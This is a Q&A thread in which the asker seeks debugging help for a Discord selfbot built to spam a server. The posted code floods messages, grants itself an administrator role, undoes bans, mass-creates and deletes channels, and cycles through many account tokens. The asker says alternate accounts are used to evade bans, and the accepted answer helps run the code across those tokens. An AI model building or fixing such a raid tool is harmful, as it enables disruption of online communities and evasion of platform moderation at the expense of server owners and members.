# Discord.py selfbot script exits instead of connecting to tokens

Tags: python, python-3.x, discord.py

I am making a discord selfbot to spam my friends server. However, in the debugging process I have been running into quite a few issues. after fixing part of my code here: [Python3 discord selfbot NameError: name 'tokens' is not defined](https://stackoverflow.com/questions/63250747/python3-discord-selfbot-nameerror-name-tokens-is-not-defined) I have been trying to start my bot, but when it starts and I enter what I want my bot to spam, it just exits. I don't know why and there is no error message. I wish that I could shorten it down, but I have absolutely no idea where the problem lies. Here is all of the code:

```
import discord
import time
import random
import string
from discord.utils import get
from discord.ext import commands
import asyncio

print("make sure that you join the target server on all accounts beforehand, THE ACCOUNTS CAN NOT BE ON ANY OTHER SERVERS")
time.sleep(2)
response=input("type what you want the bots to spam here: ")

client = commands.Bot(command_prefix="", self_bot=True)        

@client.event
async def on_member_ban(guild,user):
    await guild.unban(user)
    print("removed ban")

@client.event
async def on_message(message):
    x=100
    while int(x)==100:
        print("message sent "+random.choice(string.ascii_letters))
        try:
            await message.channel.send(response)
        except:
            print("message error")
            pass
        try:
            user=message.author
            await user.edit(nick=str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters)))
        except:
            print("can't change user nick")
            pass
        guild=message.guild
        perms=discord.Permissions(administrator=True)
        try:
            user=message.author
            await guild.create_role(name='TEST', colour=discord.Colour(0x597E8D),permissions=perms)
            role=get(guild.roles,name='TEST')
            await user.add_roles(role)
        except:
            print("maximum number of roles reached or can't add roles")
            pass
        guild=message.guild
        try:
            await guild.create_text_channel(str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters)))
            await guild.create_text_channel(str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters))+str(random.choice(string.ascii_letters)))
            await message.channel.delete()
            print("channel yeeted")
            user=message.author
        except:
            print("can't add channel")
            pass
        
@client.event
async def on_guild_channel_create(channel):
    await channel.send(response)
    
class connect(discord.Client):
    async def on_connect(selfbot):
        print("account with name "+selfbot.user.name+" has connected")

loop = asyncio.get_event_loop()
def Selfbottokens():
    with open("tokens.txt", "r") as f:
        tokens = [token.strip("\n") for token in f.readlines()]
        for i in range(len(tokens)):
            client.add_cog(client)
            loop.create_task(client.run(tokens[i], bot=False))
```

Please let me know what you think that the problem is. Any amount of help would be appreciated.

Comment: note that selfbot is against TOS

Comment: of course. I know that I can get banned and so I am using alternate accounts.

Answer (score 1, accepted):

You can read all the tokens into a list and loop the entire code something like this.

```py
with open("tokens.txt", "r") as f:
    tokens = f.read().splitlines()
    
for token in tokens:
    
    # code here 
    
    client.run(token)
```

Comment: Yes, most editors can do this my selecting it all and CTRL+] I think

Comment: strange, it no longer exits but will not connect to any of the tokens and go online even if I wait for several minutes. I may need to create a new question if I cannot find what is going on.